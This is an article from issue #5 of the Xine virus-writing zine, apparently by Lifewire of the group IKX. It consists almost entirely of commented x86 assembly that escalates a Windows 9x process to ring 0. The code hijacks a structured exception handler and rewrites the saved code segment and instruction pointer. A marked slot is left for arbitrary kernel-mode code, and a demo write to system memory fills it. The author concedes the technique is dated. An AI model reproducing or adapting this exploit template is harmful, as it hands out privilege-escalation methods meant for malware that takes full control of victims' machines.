ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Xine - issue #5 - Phile 115 ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ; Another way to get on ring0 in 9x. Not usefull nowadays, but maybe you ; find it interesting... and it is new so it is cool (?!) :) ; btw, the clue in 9x to get @ r0 is just to exec at cs=28, jmpfar & iret ; etc. aren't allowed.. so do it in this way. ; ; hmm. I see z0mbie has something like this published in mtx2 too.. hmmz ; ok, i ripped the ring0 safety pushes / stackinit from him :) .386p .model flat extrn ExitProcess:PROC; ;apis are your best friend :) ;----------------------------------------------------------------------------; _CODE segment dword use32 public 'CODE' start: int 3 ;bpint 3 do "reip eip+1" ? call initring0 ;seh addr. on stack due call ;this is the seh.. believe me or not pushad mov edx,dword ptr [esp+3*4+20h] ;where is the context record? ;maybe in edx? well i hope, u? push 28h pop eax ;oh how optimized is me! ;) xchg [edx+0bch],eax ;0bch = regCS mov [oldcs],eax ;lets save it mov dword ptr [edx+0b8h],offset ring0code ;0b8h = regEip popad ;pop xor eax,eax ;continue exec ret ;read further @ ring0code initring0: xor edx,edx push dword ptr fs:[edx] mov fs:[edx],esp ;esp points to addr. seh inc dword ptr [edx] ;read further after initring0 ;----------------------------------------------------------------------------; ring0code: ;same offset... other segment int 3 ;viva la softice mov dword ptr ss:[oldesp], esp ;save current ESP lea esp, endstack ;esp pointed not to stack! pushad push ds es push ss ss ;make es & ds <- ss pop ds es ;-- put your ring0 code from here inc dword ptr ds:[0bff70400h] ;show off with our power :) ;-- till here pop es ds ;restore es & ds popad mov esp, dword ptr ss:[oldesp] ;restore esp, else *crash* exit_ring0: ;say bye to ring0, welcome r3 pushf push oldcs push offset ring3 iret ;----------------------------------------------------------------------------; ring3: ;and here we are a ring3 lamer xor edx,edx pop dword ptr fs:[edx] ;restore the seh pop edx ;and undo the call initring0 push 0 call ExitProcess oldcs dd ? ;here we stored the org. CS oldesp dd ? ;and here... maybe esp? mystack db 1024 dup (0h) endstack: _CODE ends ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; _DATA segment dword use32 public 'DATA' db "ring0 by Lifewire/IKX" _DATA ends ;----------------------------------------------------------------------------; end start end